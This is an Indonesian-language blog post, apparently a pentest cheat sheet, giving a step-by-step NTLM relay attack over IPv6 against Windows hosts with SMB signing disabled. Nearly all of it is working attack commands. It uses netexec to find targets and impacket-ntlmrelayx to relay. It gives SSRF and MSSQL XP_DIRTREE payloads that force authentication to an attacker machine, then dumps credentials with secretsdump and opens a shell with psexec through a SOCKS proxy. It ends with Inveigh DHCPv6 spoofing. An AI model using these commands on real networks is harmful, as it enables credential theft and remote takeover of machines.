Post

NTLM Relay IPv6 Attack

Ketika pengaturan Signing pada protokol SMB (Server Message Block) memiliki pengaturan False atau dinonaktifkan, maka data yang dikirim antar klien dan server tidak diverifikasi. Sehingga komputer yang menjalankan konfigurasi SMB Signing False akan rentan terhadap serangan NTLM Relay.

Let’s Do It

1
netexec smb <IP_SEGMENT>/24 --gen-relay-list vuln-ntlm.txt

Netexec Detect All Vulnerable Hosts

1. Wait and See or Trigger It

1
sudo impacket-ntlmrelayx -tf vuln-ntlm.txt -smb2support --ipv6 -debug

NTLMRelayX

Pada dasarnya, karena ini adalah serangan Man-in-the-Middle, maka kalian hanya perlu menunggu saja dan berharap ada Host yang melakukan Broadcast melalui LLMNR/mDNS.

Namun, jika kalian menemukan kerentanan yang bisa di-chaining, seperti SSRF atau mendapatkan akses MSSQL, kalian bisa langsung men-trigger-nya secara langsung, dengan cara mengakses ke mesin kalian secara langsung (menggunakan protokol SMB).

Trigger It!

Server-Side Request Forgery.

1
file://<ATTACKER_MACHINE>/attack

MSSQL Query.

1
XP_DIRTREE '\\<ATTACKER_MACHINE>\attack', 1, 1

Credential Dumped!

Jika berhasil, maka impacket-ntlmrelayx yang dijalankan tadi akan menghasilkan output seperti ini.

SAM Pwnd!

Optional: Create Relay as Proxy Connection (Socks)

1
sudo impacket-ntlmrelayx -tf vuln-ntlm.txt -smb2support --ipv6 -debug -socks
1
2
## add to /etc/proxychains4.conf
socks4 127.0.0.1 1080

Dengan ini, kita bisa mengeksekusi mesin target menggunakan…

1
2
## Remote Credential Dump
proxychains4 -q impacket-secretsdump 'domain.local/anyuser$':'wrongpass'@<TARGET_MACHINE>

Atau.

1
2
## Run Shell Session
proxychains4 -q impacket-psexec 'domain.local/anyuser$':'wrongpass'@<TARGET_MACHINE>

2. Spoof via Compromised Machine

Setelah membaca dari sumber ini, Kita juga dapat melakukannya meskipun kondisinya itu cross-network, dengan cara melakukan Spoofing menggunakan Inveigh (dengan catatan, Spoof melalui mesin yang sudah compromised).

1
.\Inveigh.exe -DHCPv6 Y -SpooferIP <ATTACKER_MACHINE>

Kurang lebih gambarannya akan seperti ini.

Relay to SpoofIP

This post is licensed under CC BY 4.0 by the author.